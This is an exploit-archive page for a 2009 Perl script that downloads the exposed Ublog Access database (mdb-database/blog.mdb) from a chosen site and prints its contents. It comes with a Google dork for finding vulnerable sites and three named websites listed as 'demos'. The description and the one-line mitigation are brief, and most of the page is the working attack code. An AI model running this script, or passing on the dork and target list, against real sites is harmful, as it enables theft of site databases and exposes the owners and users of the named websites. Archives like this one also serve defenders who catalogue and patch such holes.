Ublog access version Arbitrary Database Disclosure Exploit

vendor:

Ublog access version

by:

Cyber-Zone (ABDELKHALEK)

7,5

CVSS

HIGH

Arbitrary Database Disclosure

200

CWE

Product Name: Ublog access version

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Ublog access version Arbitrary Database Disclosure Exploit

Ublog access version Arbitrary Database Disclosure Exploit is a perl script which exploits the vulnerability in the Ublog access version. It allows an attacker to access the mdb-database/blog.mdb file of the vulnerable website. The attacker can use the dork http://www.google.co.ma/search?q=index.asp%3Farchivio%3DOK&hl=fr&start=20&sa=N to search for vulnerable websites. The exploit uses the LWP::Simple and LWP::UserAgent modules to connect to the server and search for the file. If the file is found, the contents of the file are displayed.

Mitigation:

The user should ensure that the mdb-database/blog.mdb file is not accessible to the public.

Source

Exploit-DB raw data:

#!/usr/bin/perl
#
#
# Ublog access version
# mdb-database/blog.mdb
# dork : http://www.google.co.ma/search?q=index.asp%3Farchivio%3DOK&hl=fr&start=20&sa=N
# demos :
# http://radiologyhunters.com/blog/mdb-database/blog.mdb
# http://foges.net/mdb-database/blog.mdb
# http://www.geoaurea.it/mdb-database/blog.mdb
#
#
use LWP::Simple;
use LWP::UserAgent;

print "\tUblog access version Arbitrary Database Disclosure Exploit\n";

print "\t****************************************************************\n";
print "\t*      Found And Exploited By : Cyber-Zone (ABDELKHALEK)       *\n";
print "\t*           E-mail : Paradis_des_fous[at]hotmail.fr            *\n";
print "\t*          Home : WwW.IQ-TY.CoM , WwW.No-Exploit.CoM           *\n";
print "\t*               From : MoroccO Figuig/Oujda City               *\n";
print "\t****************************************************************\n\n\n\n";
if(@ARGV < 1)
{
&help; exit();
}
sub help()
{
print "[X] Usage : perl $0 site \n";
print "[X] Exemple : perl $0 www.site.com \n";
}
($site) = @ARGV;
print("Please Wait ! Connecting To The Server ......\n\n");
sleep(5);
$database = "mdb-database/blog.mdb";
my $exploit = "http://" . $site . "/" . $database;
print("Searching For file ...\n\n");
sleep(3);
$doexploit=get $exploit;
if($doexploit){
print("..........................File Contents...........................\n");
print("$doexploit\n");
print("..............................EOF.................................\n");
}
else {
help();
exit;
}

# milw0rm.com [2009-05-04]